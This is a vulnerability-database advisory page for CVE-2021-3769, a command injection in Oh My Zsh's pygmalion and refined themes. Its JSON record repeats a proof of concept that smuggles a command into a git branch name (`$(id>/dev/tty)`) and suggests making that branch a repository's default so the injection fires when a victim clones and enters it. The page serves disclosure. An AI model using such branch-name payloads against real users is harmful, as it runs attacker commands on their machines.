CVE-2021-3769 (GCVE-0-2021-3769)

Vulnerability from cvelistv5 – Published: 2021-11-30 09:30 – Updated: 2024-08-03 17:09
VLAI?
Title
OS Command Injection in ohmyzsh/ohmyzsh
Summary
# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme.
Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE
  • CWE-78 - OS Command Injection
Assigner
References
Impacted products
Vendor Product Version
ohmyzsh ohmyzsh/ohmyzsh Affected: unspecified , < b3ba9978 (custom)
Create a notification for this product.
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T17:09:08.686Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ohmyzsh/ohmyzsh",
          "vendor": "ohmyzsh",
          "versions": [
            {
              "lessThan": "b3ba9978",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo \u0026\u0026 cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`:\n\n   ```sh\n   badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n   git checkout -b \"$badbranch\"\n   ```\n\n   In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n   ```console\n   user@host:~/exploit-poc|master \u21d2  badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027; git checkout -b \"$badbranch\"\n   Switched to a new branch \u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n   uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n   uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n   user@host:~/exploit-poc|feat/bad-branch \u21d2 \n   ```\n\n   A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78 OS Command Injection",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-11-30T09:30:18",
        "orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
        "shortName": "@huntrdev"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
        }
      ],
      "title": "OS Command Injection in ohmyzsh/ohmyzsh",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@huntr.dev",
          "ID": "CVE-2021-3769",
          "STATE": "PUBLIC",
          "TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "ohmyzsh/ohmyzsh",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_value": "b3ba9978"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "ohmyzsh"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."
            }
          ]
        },
        "exploit": [
          {
            "lang": "en",
            "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo \u0026\u0026 cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`:\n\n   ```sh\n   badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n   git checkout -b \"$badbranch\"\n   ```\n\n   In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n   ```console\n   user@host:~/exploit-poc|master \u21d2  badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027; git checkout -b \"$badbranch\"\n   Switched to a new branch \u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n   uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n   uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n   user@host:~/exploit-poc|feat/bad-branch \u21d2 \n   ```\n\n   A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
          }
        ],
        "impact": {
          "cvss": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-78 OS Command Injection"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978",
              "refsource": "MISC",
              "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
    "assignerShortName": "@huntrdev",
    "cveId": "CVE-2021-3769",
    "datePublished": "2021-11-30T09:30:18",
    "dateReserved": "2021-09-05T00:00:00",
    "dateUpdated": "2024-08-03T17:09:08.686Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2021-3769\",\"sourceIdentifier\":\"security@huntr.dev\",\"published\":\"2021-11-30T10:15:09.000\",\"lastModified\":\"2024-11-21T06:22:22.900\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme.\"},{\"lang\":\"es\",\"value\":\"# Vulnerabilidad en los temas \\\"pygmalion\\\", \\\"pygmalion-virtualenv\\\" y \\\"refined\\\" **Descripci\u00f3n**: estos temas usan \\\"print -P\\\" en las cadenas proporcionadas por el usuario para imprimirlas en la terminal. Todos ellos lo hacen sobre la informaci\u00f3n de git, particularmente el nombre de la rama, por lo que si la rama presenta un nombre especialmente dise\u00f1ado la vulnerabilidad puede ser explotada. **Corregido en**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **\u00c1reas afectadas**: - Tema \\\"pygmalion\\\". - Tema \\\"pygmalion-virtualenv\\\". - Tema \\\"refined\\\"\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security@huntr.dev\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.6,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:C/I:C/A:C\",\"baseScore\":10.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"COMPLETE\",\"integrityImpact\":\"COMPLETE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":10.0,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"security@huntr.dev\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:planetargon:oh_my_zsh:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2021-11-11\",\"matchCriteriaId\":\"80FD5E81-3E73-4921-925C-E55098EAE4B1\"}]}]}],\"references\":[{\"url\":\"https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978\",\"source\":\"security@huntr.dev\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]}]}}"
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.